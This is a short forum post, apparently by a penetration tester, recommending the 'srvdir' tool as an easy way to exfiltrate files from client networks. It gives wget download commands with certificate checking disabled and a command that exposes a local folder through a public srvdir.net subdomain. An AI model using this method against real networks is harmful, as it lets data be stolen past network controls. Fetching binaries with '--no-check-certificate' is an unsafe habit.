Aerosol Posted December 27, 2014 Report Share Posted December 27, 2014 Every now and then I come across some application that may or may not have been developed with penetration testing in mind but it ends up being damn helpful all the same. Yesterday I found a post about ‘srvdir‘ (surv~durr?) which is designed to share content over SSL/TLS via a public site.When trying to exfiltrate data from a client site I normally spend a lot of time setting up tunnels, using disposable A records from afraid.org and one of my boxes in some east-european cave just so I can get the damn ‘payroll-summary-june-2014.pdf’ trophy off some box that is swimming in ssh-tunnel-fu. srvdir is the perfect answer to this problem and testing it has been awesome and full of those “Why didn’t I think of this?!!” rants.Essentially, what srvdir does is to create a SSL tunnel to the mothership ‘srvdir.net’ and issue a subdomain that can be accessed externally to siphon the files off. Grabbing files is relatively painless with the odd 404 for the permission snobs. It supports basic http-auth for the paranoid and by the looks of it, tokens as well. It runs seamlessly on Windows, Linux and OSX and is relatively small.To get the file, use wget:Windowswget.exe --no-check-certificate https://dl.srvdir.net/windows_386/srvdir.zipMac OSXwget --no-check-certificate https://dl.srvdir.net/darwin_amd64/srvdir.zipLinuxwget --no-check-certificate https://dl.srvdir.net/linux_386/srvdir.zipUnzip the file:unzip srvdir.zipHelp./srvdir -hUsage:./srvdir [-auth="username:password"] subdomain:pathShare current folder with custom subdomain./srvdir norsec0de:.Source Quote Link to comment Share on other sites More sharing options...
